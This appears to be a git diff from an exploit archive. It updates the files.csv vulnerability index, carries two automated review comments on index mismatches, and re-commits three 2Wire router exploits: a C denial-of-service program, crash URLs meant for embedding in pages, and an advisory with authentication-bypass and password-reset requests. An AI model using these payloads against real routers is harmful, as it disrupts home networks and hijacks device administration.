 27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow",2013-08-15,metasploit,windows,remote,80
 27607,platforms/windows/remote/27607.rb,"MiniWeb (Build 300) Arbitrary File Upload",2013-08-15,metasploit,windows,remote,8000
 27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD Stack Buffer Overflow",2013-08-15,metasploit,windows,remote,80
-27609,platforms/windows/local/27609.rb,"Chasys Draw IES Buffer Overflow",2013-08-15,metasploit,windows,local,0
+27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow",2013-08-15,metasploit,windows,local,0
 27610,platforms/php/remote/27610.rb,"Joomla Media Manager File Upload Vulnerability",2013-08-15,metasploit,php,remote,80
 27611,platforms/windows/remote/27611.txt,"Oracle Java IntegerInterleavedRaster.verify() Signed Integer Overflow",2013-08-15,"Packet Storm",windows,remote,0
 27612,platforms/php/webapps/27612.txt,"ShopWeezle 2.0 login.php itemID Parameter SQL Injection",2006-04-10,r0t,php,webapps,0
@@ -26832,8 +26826,8 @@ id,file,description,date,author,platform,type,port
 29897,platforms/windows/remote/29897.txt,"Progress 3.1 Webspeed _CPYFile.P Unauthorized Access Vulnerability",2007-04-24,suresync,windows,remote,0
 29898,platforms/php/webapps/29898.txt,"plesk <= 8.1.1 login.php3 - Directory Traversal vulnerability",2007-04-25,anonymous,php,webapps,0
 29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 Include.PHP Remote File Include Vulnerability",2007-04-25,"Ali and Saeid",php,webapps,0
-29900,platforms/multiple/dos/29900.txt,"Asterisk 1.4 SIP T.38 SDP Parsing Remote Stack Buffer Overflow Vulnerabilities (1)",2007-03-21,"Barrie Dempster",multiple,dos,0
-29901,platforms/multiple/dos/29901.txt,"Asterisk 1.4 SIP T.38 SDP Parsing Remote Stack Buffer Overflow Vulnerabilities (2)",2007-03-21,"Barrie Dempster",multiple,dos,0
+29900,platforms/multiple/dos/29900.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow Vulnerabilities (1)",2007-03-21,"Barrie Dempster",multiple,dos,0
+29901,platforms/multiple/dos/29901.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow Vulnerabilities (2)",2007-03-21,"Barrie Dempster",multiple,dos,0
 29902,platforms/php/webapps/29902.txt,"PHPMyTGP 1.4 AddVIP.PHP Remote File Include Vulnerability",2007-04-25,alijsb,php,webapps,0
 29903,platforms/php/webapps/29903.txt,"Ahhp Portal Page.PHP Multiple Remote File Include Vulnerabilities",2007-04-25,CodeXpLoder'tq,php,webapps,0
 29904,platforms/php/webapps/29904.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool b2archives.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0
@@ -27774,7 +27768,7 @@ id,file,description,date,author,platform,type,port
 30953,platforms/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80
 30954,platforms/php/webapps/30954.txt,"PHPJabbers Hotel Booking System 3.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80
 30955,platforms/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80
-30956,platforms/linux/dos/30956.txt,"CoolPlayer 217 'CPLI_ReadTag_OGG()' Buffer Overflow Vulnerability",2007-12-28,"Luigi Auriemma",linux,dos,0
+30956,platforms/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow Vulnerability",2007-12-28,"Luigi Auriemma",linux,dos,0
 30957,platforms/php/webapps/30957.txt,"PHCDownload 1.1 search.php string Parameter SQL Injection",2007-12-29,Lostmon,php,webapps,0
 30958,platforms/php/webapps/30958.txt,"PHCDownload 1.1 search.php string Parameter XSS",2007-12-29,Lostmon,php,webapps,0
 30959,platforms/php/webapps/30959.txt,"Makale Scripti Cross-Site Scripting Vulnerability",2007-12-29,GeFORC3,php,webapps,0
@@ -27829,7 +27823,7 @@ id,file,description,date,author,platform,type,port
 31009,platforms/php/webapps/31009.txt,"ID-Commerce 2.0 'liste.php' SQL Injection Vulnerability",2008-01-10,consultant.securite,php,webapps,0
 31010,platforms/multiple/remote/31010.sql,"Oracle Database 10 g XML DB XDB.XDB_PITRIG_PKG Package PITRIG_TRUNCATE Function Overflow",2008-01-10,sh2kerr,multiple,remote,0
 31011,platforms/php/webapps/31011.txt,"Members Area System 1.7 'view_func.php' Remote File Include Vulnerability",2008-01-11,ShipNX,php,webapps,0
-31013,platforms/hardware/remote/31013.txt,"2Wire Routers Cross-Site Request Forgery Vulnerability",2008-01-15,hkm,hardware,remote,0
+31013,platforms/hardware/remote/31013.txt,"2Wire Routers - Cross-Site Request Forgery Vulnerability",2008-01-15,hkm,hardware,remote,0
 31014,platforms/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53
 31015,platforms/php/webapps/31015.txt,"bloofox CMS 0.5.0 - Multiple Vulnerabilities",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,80
 31017,platforms/asp/webapps/31017.php,"SmarterMail Enterprise and Standard <=11.x - Stored XSS",2014-01-17,"Saeed reza Zamanian",asp,webapps,80
@@ -27892,7 +27886,7 @@ id,file,description,date,author,platform,type,port
 31075,platforms/php/webapps/31075.txt,"AmpJuke 0.7 'index.php' Cross-Site Scripting Vulnerability",2008-01-29,ShaFuck31,php,webapps,0
 31076,platforms/linux/remote/31076.py,"MPlayer 1.0rc2 'demux_mov.c' Remote Code Execution Vulnerability",2008-02-04,"Felipe Manzano",linux,remote,0
 31077,platforms/php/webapps/31077.txt,"Mambo/Joomla 'com_buslicense' Component - 'aid' Parameter SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0
-31078,platforms/hardware/remote/31078.txt,"2Wire Routers 'H04_POST' Access Validation Vulnerability",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0
+31078,platforms/hardware/remote/31078.txt,"2Wire Routers 'H04_POST' - Access Validation Vulnerability",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0
 31079,platforms/php/webapps/31079.txt,"webSPELL 4.1.2 'whoisonline.php' Cross-Site Scripting Vulnerability",2008-01-30,NBBN,php,webapps,0
 31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri 'index.php' SQL Injection Vulnerability",2008-01-30,ShaFuck31,php,webapps,0
 31081,platforms/cgi/webapps/31081.txt,"OpenBSD 4.1 bgplg 'cmd' Parameter Cross-Site Scripting Vulnerability",2007-10-10,"Anton Karpov",cgi,webapps,0
@@ -29263,8 +29257,8 @@ id,file,description,date,author,platform,type,port
 32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 (.m3u, .pls, .asx) - Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
 32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) users/update_roles Missing Authorization",2014-03-26,metasploit,linux,remote,443
 32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 (xhr.php, i param) - SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80
-32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0
-32518,platforms/windows/remote/32518.txt,"Google Chrome 0.2.149 ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0
+32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 - ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0
+32518,platforms/windows/remote/32518.html,"Google Chrome 0.2.149 - ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0
 32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - uuids DoS Exploit",2014-03-26,"Krusty Hack",multiple,dos,0
 32520,platforms/php/webapps/32520.txt,"OpenCart <= 1.5.6.1 - (openbay) Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0
 32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 'ListRecords.php' Multiple Remote File Include Vulnerabilities",2008-10-23,BoZKuRTSeRDaR,php,webapps,0
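Review bot: Record 32518's `file` column now ends in `.html` (`platforms/windows/remote/32518.html`) while no rename of `platforms/windows/remote/32518.txt` appears anywhere in this diff, so the index may point at a path that does not exist in the tree. If the rename lives in another commit this is fine; otherwise keep `32518.txt` here or move the file in the same change so files.csv and the tree stay in step. The separator edits on 32517 and 32518 are consistent with the rest of the commit and need nothing further.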
@@ -29751,7 +29745,7 @@ id,file,description,date,author,platform,type,port
 33024,platforms/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure Vulnerability",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote,0
 33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 'cfgadvanced.html' HTTP Header Injection Vulnerability",2009-06-05,Inferno,windows,remote,0
 33026,platforms/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,ios,webapps,0
-33027,platforms/windows/remote/33027.py,"Kolibri 2.0 GET Request - Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80
+33027,platforms/windows/remote/33027.py,"Kolibri 2.0 - GET Request Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80
 33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0
 33030,platforms/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities",2014-04-26,JIKO,php,webapps,0
 33031,platforms/linux/dos/33031.html,"Mozilla Firefox 3.0.x Large GIF File Background Denial of Service Vulnerability",2009-05-10,"Ahmad Muammar",linux,dos,0
@@ -29862,7 +29856,7 @@ id,file,description,date,author,platform,type,port
 33144,platforms/php/webapps/33144.txt,"Censura Prior to 2.1.1 Multiple Cross Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0
 33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework Default Location Insecure Temporary File Creation Vulnerability",2009-08-03,"Melissa Elliott",linux,local,0
 33146,platforms/php/webapps/33146.txt,"CS-Cart 2.0.5 'reward_points.post.php' SQL Injection Vulnerability",2009-08-04,"Ryan Dewhurst",php,webapps,0
-33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 'txtkeyword' Parameter Cross Site Scripting Vulnerability",2009-08-05,"599eme Man",php,webapps,0
+33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Parameter Cross Site Scripting Vulnerability",2009-08-05,"599eme Man",php,webapps,0
 33148,platforms/linux/dos/33148.c,"Linux Kernel 2.6.x 'posix-timers.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-06,"Hiroshi Shimamoto",linux,dos,0
 33149,platforms/php/webapps/33149.txt,"Alkacon OpenCms 7.x Multiple Input Validation Vulnerabilities",2009-08-06,"Katie French",php,webapps,0
 33152,platforms/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 'cat' Parameter Cross Site Scripting and SQL Injection Vulnerabilities",2009-08-07,"599eme Man",php,webapps,0
@@ -29878,7 +29872,7 @@ id,file,description,date,author,platform,type,port
 33162,platforms/php/remote/33162.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (1)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0
 33163,platforms/php/remote/33163.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (2)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0
 33164,platforms/multiple/remote/33164.txt,"WebKit Floating Point Number Remote Buffer Overflow Vulnerability",2009-08-11,Apple,multiple,remote,0
-33165,platforms/hardware/remote/33165.txt,"2Wire Routers 'CD35_SETUP_01' Access Validation Vulnerability",2009-08-12,hkm,hardware,remote,0
+33165,platforms/hardware/remote/33165.txt,"2Wire Routers 'CD35_SETUP_01' - Access Validation Vulnerability",2009-08-12,hkm,hardware,remote,0
 33166,platforms/php/webapps/33166.txt,"Discuz! 6.0 '2fly_gift.php' SQL Injection Vulnerability",2009-08-15,Securitylab.ir,php,webapps,0
 33167,platforms/cfm/webapps/33167.txt,"Adobe ColdFusion Server <= 8.0.1 wizards/common/_authenticatewizarduser.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0
 33168,platforms/cfm/webapps/33168.txt,"Adobe ColdFusion Server <= 8.0.1 administrator/logviewer/searchlog.cfm startRow Parameter XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0
@@ -30087,8 +30081,29 @@ id,file,description,date,author,platform,type,port
 33392,platforms/php/webapps/33392.txt,"YOOtheme Warp5 Joomla! Component 'yt_color' Parameter Cross Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0
 33393,platforms/php/webapps/33393.txt,"Joomla! You!Hostit! 1.0.1 Template Cross-Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0
 33394,platforms/php/webapps/33394.txt,"Invision Power Board <= 3.0.3 '.txt' File MIME-Type Cross Site Scripting Vulnerability",2009-12-09,Xacker,php,webapps,0
+33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Local Privilege Escalation Vulnerability",2009-11-09,"Akira Fujita",linux,local,0
 33396,platforms/php/webapps/33396.txt,"Zeeways ZeeJobsite 'basic_search_result.php' Cross Site Scripting Vulnerability",2009-12-10,bi0,php,webapps,0
 33397,platforms/linux/dos/33397.txt,"MySQL <= 6.0.9 SELECT Statement WHERE Clause Sub-query DoS",2009-11-23,"Shane Bester",linux,dos,0
 33398,platforms/linux/dos/33398.txt,"MySQL <= 6.0.9 GeomFromWKB() Function First Argument Geometry Value Handling DoS",2009-11-23,"Shane Bester",linux,dos,0
 33399,platforms/multiple/remote/33399.txt,"Oracle E-Business Suite 11i Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote,0
 33400,platforms/php/webapps/33400.txt,"Ez Cart 'sid' Parameter Cross Site Scripting Vulnerability",2009-12-14,anti-gov,php,webapps,0
+33401,platforms/php/webapps/33401.txt,"Million Pixel Script 3 'pa' Parameter Cross Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0
+33402,platforms/linux/remote/33402.txt,"Ruby on Rails <= 2.3.5 'protect_from_forgery' Cross Site Request Forgery Vulnerability",2009-12-14,p0deje,linux,remote,0
+33403,platforms/windows/dos/33403.py,"Intellicom 1.3 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow Vulnerability",2009-12-14,"Ruben Santamarta ",windows,dos,0
+33404,platforms/php/webapps/33404.txt,"phpFaber CMS 1.3.36 'module.php' Cross Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0
+33405,platforms/multiple/remote/33405.txt,"APC Network Management Card Cross Site Request Forgery and Cross Site Scripting Vulnerabilities",2009-12-15,"Jamal Pecou",multiple,remote,0
+33406,platforms/php/webapps/33406.txt,"Horde <= 3.3.5 Administration Interface admin/phpshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0
+33407,platforms/php/webapps/33407.txt,"Horde <= 3.3.5 Administration Interface admin/cmdshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0
+33408,platforms/php/webapps/33408.txt,"Horde <= 3.3.5 Administration Interface admin/sqlshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0
+33409,platforms/php/webapps/33409.txt,"Article Directory 'login.php' SQL Injection Vulnerabilities",2009-12-16,"R3d D3v!L",php,webapps,0
+33410,platforms/php/webapps/33410.txt,"Drupal Sections 5.x-1.2/6.x-1.2 Module HTML Injection Vulnerability",2009-12-16,"Justin C. Klein Keane",php,webapps,0
+33411,platforms/php/webapps/33411.txt,"iSupport 1.8 ticket_function.php Multiple Parameter XSS",2009-12-16,"Stink and Essandre",php,webapps,0
+33412,platforms/php/webapps/33412.txt,"iSupport 1.8 index.php which Parameter XSS",2009-12-16,"Stink and Essandre",php,webapps,0
+33413,platforms/php/webapps/33413.txt,"Pluxml-Blog 4.2 'core/admin/auth.php' Cross Site Scripting Vulnerability",2009-12-17,Metropolis,php,webapps,0
+33414,platforms/php/remote/33414.php,"PHP <= 5.2.11 'htmlspecialcharacters()' Malformed Multibyte Character Cross Site Scripting Vulnerability (1)",2009-12-17,hello@iwamot.com,php,remote,0
+33415,platforms/php/remote/33415.php,"PHP <= 5.2.11 'htmlspecialcharacters()' Malformed Multibyte Character Cross Site Scripting Vulnerability (2)",2009-12-17,hello@iwamot.com,php,remote,0
+33416,platforms/php/webapps/33416.txt,"QuiXplorer 2.x 'lang' Parameter Local File Include Vulnerability",2009-12-17,"Juan Galiana Lara",php,webapps,0
+33417,platforms/php/webapps/33417.txt,"cPanel 11.x 'fileop' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-12-17,RENO,php,webapps,0
+33418,platforms/php/webapps/33418.txt,"Joomla! 'com_joomportfolio' Component 'secid' Parameter SQL Injection Vulnerability",2009-12-17,"Fl0riX and Snakespc",php,webapps,0
+33419,platforms/php/webapps/33419.txt,"F3Site 2009 mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
+33420,platforms/php/webapps/33420.txt,"F3Site 2009 mod/new.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
diff --git a/platforms/hardware/dos/2246.cpp b/platforms/hardware/dos/2246.cpp
index ea2ffaa31..169d79b19 100755
--- a/platforms/hardware/dos/2246.cpp
+++ b/platforms/hardware/dos/2246.cpp
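Review bot: Several of the added author fields carry a trailing space inside the quotes — `"Ruben Santamarta "` on row 33403 and `"cr4wl3r "` on rows 33419 and 33420 — so these authors will sort and group apart from the same name written without the space; trim them to `"Ruben Santamarta"` and `"cr4wl3r"` (the pre-existing `"HackXBack "` rows show the same pattern but are outside this change). Row 33402 is titled `Ruby on Rails <= 2.3.5 'protect_from_forgery' ...`, whereas the new platforms/linux/remote/33402.txt added later in this diff describes itself as a Redmine <= 0.8.6 CSRF issue; the index entry and the file should agree, for example by naming Redmine in the description. Of the 21 rows added here, only 33395.txt and 33402.txt are created in the part of the diff visible to me — confirm that the files for 33401 and 33403–33420 exist, since a files.csv row with no file behind it is the same class of problem as the 32518 path change in the earlier hunk.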
@@ -1,95 +1,95 @@ -//Vulnerable: -//2Wire OfficePortal 0 -//2Wire HomePortal 1500W -//2Wire HomePortal 100W -//2Wire HomePortal 100S -//2Wire HomePortal 1000W -//2Wire HomePortal 1000SW -//2Wire HomePortal 1000S -//2Wire HomePortal 1000 -//2Wire HomePortal 0 -////////////////////////////////// [ STARTING CODE ] -//////////////////////////////////////////////////// -//// -//// [ Explanation ] this PoC make an evil_request -//// and send to the server , when the server process -//// it the request fall him, AND THE MODEM WILL RESET!. -//// -//// [ Note ] This Poc was coded using Dev-C++ 4.9.9.2 -//// If you have any error with the librarys you need -//// include libws2_32.a at the project. -//// -//// Enjoy it n_nU!.. -//// Coded by preth00nker (using Mexican skill!) - -#pragma comment(lib,"libws2_32.a") -#include -#include -#include -#include "winsock2.h" - -unsigned long dir; -char h[]=""; -short port; -char badreq[]=""; -int state; - -int main(int argc, char *argv[]) -{ - printf("\n################################################\n"); - printf("####\n"); - printf("#### PoC of DoS 2wire_Gateway\n"); - printf("#### By Preth00nker\n"); - printf("#### http://www.mexhackteam.org\n"); - printf("####\n"); - printf("####\n\n"); - if (argc<4){ - printf("[Usage] %s $Host $Port $Variable\n",argv[0]); - printf("\n[I.E.] 
%s 192.168.1.254 80 PAGE\n",argv[0]); - return 0; - } - //Crear socket - WSADATA wsaData; - WSAStartup(MAKEWORD(2,2),&wsaData); - SOCKET wsck; - //Estructuras - struct sockaddr_in Wins; - struct hostent *target; - //Wins - Wins.sin_family=AF_INET; - Wins.sin_port=htons((short)atoi(argv[2])); - target=gethostbyname(argv[1]); - Wins.sin_addr.s_addr=inet_addr(inet_ntoa(*(struct in_addr *)target->h_addr)); - //llamamos al socket - wsck=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,(int unsigned)NULL,(int unsigned)NULL,(int unsigned)NULL); - //Verifica por error - if (wsck==SOCKET_ERROR){printf("Error al crear el socket =!..");WSACleanup();return 0;} - printf("Socket creado correctamente!.. hWndl: %d",wsck); - //Conecta - if(WSAConnect(wsck,(SOCKADDR*)&Wins,sizeof(Wins),NULL,NULL,NULL,NULL)==SOCKET_ERROR){ - WSACleanup(); - return 0; - printf("\nError al conectar =!.."); - } - printf("\nConectado!.."); - //Make a bad query and send it ..Mwajuajua!.. - strcat(badreq,"GET /xslt?"); - strcat(badreq,argv[3]); - strcat(badreq,"=%0D%0A HTTP/1.0\r\n"); - strcat(badreq,"Accept-Language: es-mx\r\n"); - strcat(badreq,"User-Agent: MexHackTeam\r\n"); - strcat(badreq,"Host: "); - strcat(badreq,argv[1]); - strcat(badreq, "\r\n\r\n\r\n"); - send(wsck , badreq ,(int)strlen(badreq), 0); - printf("\nDatos Mandados!.."); - //finalized - Sleep(100); - printf("\nThat's all, Check this out!...\n"); - WSACleanup(); - return 0; -} -//////////////////////////////////////////// [ EOF ] -//////////////////////////////////////////////////// - -// milw0rm.com [2006-08-22] +//Vulnerable: +//2Wire OfficePortal 0 +//2Wire HomePortal 1500W +//2Wire HomePortal 100W +//2Wire HomePortal 100S +//2Wire HomePortal 1000W +//2Wire HomePortal 1000SW +//2Wire HomePortal 1000S +//2Wire HomePortal 1000 +//2Wire HomePortal 0 +////////////////////////////////// [ STARTING CODE ] +//////////////////////////////////////////////////// +//// +//// [ Explanation ] this PoC make an evil_request +//// and send to the server , 
when the server process +//// it the request fall him, AND THE MODEM WILL RESET!. +//// +//// [ Note ] This Poc was coded using Dev-C++ 4.9.9.2 +//// If you have any error with the librarys you need +//// include libws2_32.a at the project. +//// +//// Enjoy it n_nU!.. +//// Coded by preth00nker (using Mexican skill!) + +#pragma comment(lib,"libws2_32.a") +#include +#include +#include +#include "winsock2.h" + +unsigned long dir; +char h[]=""; +short port; +char badreq[]=""; +int state; + +int main(int argc, char *argv[]) +{ + printf("\n################################################\n"); + printf("####\n"); + printf("#### PoC of DoS 2wire_Gateway\n"); + printf("#### By Preth00nker\n"); + printf("#### http://www.mexhackteam.org\n"); + printf("####\n"); + printf("####\n\n"); + if (argc<4){ + printf("[Usage] %s $Host $Port $Variable\n",argv[0]); + printf("\n[I.E.] %s 192.168.1.254 80 PAGE\n",argv[0]); + return 0; + } + //Crear socket + WSADATA wsaData; + WSAStartup(MAKEWORD(2,2),&wsaData); + SOCKET wsck; + //Estructuras + struct sockaddr_in Wins; + struct hostent *target; + //Wins + Wins.sin_family=AF_INET; + Wins.sin_port=htons((short)atoi(argv[2])); + target=gethostbyname(argv[1]); + Wins.sin_addr.s_addr=inet_addr(inet_ntoa(*(struct in_addr *)target->h_addr)); + //llamamos al socket + wsck=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,(int unsigned)NULL,(int unsigned)NULL,(int unsigned)NULL); + //Verifica por error + if (wsck==SOCKET_ERROR){printf("Error al crear el socket =!..");WSACleanup();return 0;} + printf("Socket creado correctamente!.. hWndl: %d",wsck); + //Conecta + if(WSAConnect(wsck,(SOCKADDR*)&Wins,sizeof(Wins),NULL,NULL,NULL,NULL)==SOCKET_ERROR){ + WSACleanup(); + return 0; + printf("\nError al conectar =!.."); + } + printf("\nConectado!.."); + //Make a bad query and send it ..Mwajuajua!.. 
+ strcat(badreq,"GET /xslt?"); + strcat(badreq,argv[3]); + strcat(badreq,"=%0D%0A HTTP/1.0\r\n"); + strcat(badreq,"Accept-Language: es-mx\r\n"); + strcat(badreq,"User-Agent: MexHackTeam\r\n"); + strcat(badreq,"Host: "); + strcat(badreq,argv[1]); + strcat(badreq, "\r\n\r\n\r\n"); + send(wsck , badreq ,(int)strlen(badreq), 0); + printf("\nDatos Mandados!.."); + //finalized + Sleep(100); + printf("\nThat's all, Check this out!...\n"); + WSACleanup(); + return 0; +} +//////////////////////////////////////////// [ EOF ] +//////////////////////////////////////////////////// + +// milw0rm.com [2006-08-22] diff --git a/platforms/hardware/dos/7060.txt b/platforms/hardware/dos/7060.txt index c48e1d4cf..2f21d8f43 100755 --- a/platforms/hardware/dos/7060.txt +++ b/platforms/hardware/dos/7060.txt 
@@ -1,34 +1,34 @@ -2WIRE ROUTER DSL DENIAL OF SERVICE - - -VULNERABLE -Model: 1701HG, 1800HW, 2071HG, 2700HG Gateway -Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51 - -The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character. - -PoC: (this can be set in an IMG tag or whatever) - -http://gateway.2wire.net/xslt?page=%& -http://gateway.2wire.net/xslt?page=%@ -http://gateway.2wire.net/xslt?page=%! -http://gateway.2wire.net/xslt?page=%+ -http://gateway.2wire.net/xslt?page=%; -http://gateway.2wire.net/xslt?page=%' -http://gateway.2wire.net/xslt?page=%~ -http://gateway.2wire.net/xslt?page=%* -http://gateway.2wire.net/xslt?page=%0 -http://gateway.2wire.net/xslt?page=%9 -http://gateway.2wire.net/xslt?page=%? -http://home... -etc... - - -hkm - - -hkm {@} hakim.ws - -Greets: UNDERGROUND.ORG.MX, daemon, acid_java, beck, dex. - -# milw0rm.com [2008-11-08] +2WIRE ROUTER DSL DENIAL OF SERVICE + + +VULNERABLE +Model: 1701HG, 1800HW, 2071HG, 2700HG Gateway +Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51 + +The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character. + +PoC: (this can be set in an IMG tag or whatever) + +http://gateway.2wire.net/xslt?page=%& +http://gateway.2wire.net/xslt?page=%@ +http://gateway.2wire.net/xslt?page=%! +http://gateway.2wire.net/xslt?page=%+ +http://gateway.2wire.net/xslt?page=%; +http://gateway.2wire.net/xslt?page=%' +http://gateway.2wire.net/xslt?page=%~ +http://gateway.2wire.net/xslt?page=%* +http://gateway.2wire.net/xslt?page=%0 +http://gateway.2wire.net/xslt?page=%9 +http://gateway.2wire.net/xslt?page=%? +http://home... +etc... + + +hkm + + +hkm {@} hakim.ws + +Greets: UNDERGROUND.ORG.MX, daemon, acid_java, beck, dex. + +# milw0rm.com [2008-11-08] diff --git a/platforms/hardware/remote/9422.txt b/platforms/hardware/remote/9422.txt index 873a802f9..000e43e25 100755 --- a/platforms/hardware/remote/9422.txt 
+++ b/platforms/hardware/remote/9422.txt 
@@ -1,81 +1,81 @@ -2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET (08/04/09) -============================================================== - - - DESCRIPTION ------------------ -There is an authentication bypass vulnerability in page=CD35_SETUP_01 that -allows you to set a new password even if the password was previously set. - -By setting a new password with more than 512 characters the password gets -reset and next time you access the router you will be prompted for a new -password. - - - VULNERABLE ----------------- -2Wire 2071 Gateway -2Wire 1800HW -2Wire 1701HG - - Firmware -5.29.51 -3.17.5 -3.7.1 - - NOT VULNERABLE --------------------- - Firmware -5.29.135.5 or later - - - DISCLOSURE TIMELINE -------------------------- -03/27/2009 - 2wire Contacted no satisfactory response -07/11/2009 - Sent complete details to 2wire no response -07/17/2009 - Sent advisory with video demo to 2wire ticket status escalated, but no response -08/02/2009 - Made public @ Defcon 17 - - - EXPLOIT/POC ------------------ -Authentication Bypass - just use this page to set a new password - - http://gateway.2wire.net?xslt?page=CD35_SETUP_01 - -Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv - - -Password Reset - using the same form but sending a password > 512 characters - -http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkm -hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh -kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk -mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm -hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh -kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk -mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh -kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm 
